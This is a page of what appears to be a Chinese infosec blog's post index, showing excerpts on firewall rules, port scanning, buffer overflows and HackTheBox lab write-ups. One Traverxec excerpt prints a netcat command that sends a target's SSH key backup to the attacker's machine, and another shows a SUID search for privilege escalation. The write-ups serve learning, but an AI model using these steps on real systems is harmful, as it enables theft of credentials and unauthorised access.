InfoSec learning 
  • 首页
  • 归档
  • 分类
  • 标签
  • 搜索
root@whale3070:~# _

友链

此篇博客写于2020.1.27日最后更新于2024.8.10日 时间是最可怕的武器。 同行的博客纯属记录,排名不分先后。放在chrome收藏夹里从来不看是不行的…… |序号|向前辈学习…| 现状2024.8 ||1| https://klionsec.github.io/| 404 删号跑路了 ||2| https://introspelliam.github.io/| 2018年后就没更新了

2020-01-27
backup

iptables-配置防火墙规则

参考资料:《鸟哥的Linux私房菜服务器架设篇(第三版)》 引言网络安全根本原因可能是由于信息不对称引起的。有些主机管理员,不知道自己开放了哪些服务,哪些是不安全的,哪些服务有漏洞,为什么不能因为好记而不使用弱密码。如果所有计算机使用者都知道的话,那么所有主机使用者都是网络安全专家了。 防火墙不能防止所有病毒、木马、漏洞利用,但是它的作用是减少攻击面。 举个例子,如果有一栋屋子,没有窗户,没有门,

2020-01-23
linux

各种系统的网卡配置

fedora重启修改密码https://docs.fedoraproject.org/en-US/quick-docs/reset-root-password/ https://forums.fedoraforum.org/showthread.php?92959-cant-reset-root-passwd-Authentication-token-lock-busymount -o remou

2020-01-23
linux

mantis(敏感信息泄露+445端口连接)

10.10.10.52使用脚本扫描端口 cat 10.10.10.52.txt 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757653/tcp open

2020-01-21
training

一个快速全端口扫描的bash脚本

1234567891011#!/bin/bashread -p "which ip? " ipmasscan -p1-65535,U:1-65535 ${ip} --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports #修改这里的网卡名称tun0为你自己的联网的网卡what=$(awk 'NR<

2020-01-17
scan

slmail&windows缓冲区溢出案例(二)

上一篇:https://whale3070.github.io/buffer%20overflow/2019/12/13/08-x/上一篇:https://whale3070.github.io/buffer%20overflow/2019/12/13/08-x/categories: - buffer overflow上一篇:https://whale3070.github.io/buffer

2020-01-15
buffer overflow 上一篇:[https://whale3070.github.io/buffer%20overflow/2019/12/13/08-x/](https://whale3070.github.io/buffer%20overflow/2019/12/13/08-x/)

Calamity(lxd之linux容器错误权限的提权)

上一篇:Calamity(web rce)上一篇:Calamity(web rce)categories: - training上一篇:Calamity(web rce) Calamity(lxd之linux容器错误权限的提权)参考资料: https://reboare.github.io/hackthebox/calamity.html https://www.youtube.com/wat

2020-01-09
training [上一篇:Calamity(web rce)](https://whale3070.github.io/training/2019/03/21/x/)

Sneaky(suid+缓冲区溢出提权)

上一篇:Sneaky(snmp默认口令泄露敏感信息) 参考资料: 缓冲区溢出案例(一) ippsec youtube video 名词解释函数返回地址:保存当前函数调用前的信息,一边函数返回时能够回复到函数被调用前的代码区中继续执行指令。EIP: 指令寄存器,指向下一条等待执行的指令地址。 找到suid权限的程序1find / -perm -4000 2>/dev/null >

2020-01-06
training

电脑有线宽带共享给手机无线上网

电脑有线宽带共享给手机无线上网,优点:只需要一台电脑,不需要买其他硬件。 开启wifi 确认电脑网卡支持承载网络netsh wlan show drivers 你的网卡必须支持承载网络,如果网卡不支持承载网络,就无法共享wifi给手机上网。 确认windows已经开启防火墙,否则wifi数据传输可能出错 cmd命令配置热点名称和密码1netsh wlan set hostednetwork mod

2020-01-02
problem

Traverxec(ssh2john爆破id_rsa对应密码)

目标机器主动连接kali,成功kali: nc -lnvp 8888 > backup-ssh-identity-files.tgz目标机器:nc 10.10.14.8 8888 -w 10 < backup-ssh-identity-files.tgz 解压gunzip backup-ssh-identity-files.tgz解压后,发现/home/david

2020-01-01
1…8990919293…116
Whale3070
总访问量 次 总访客数 人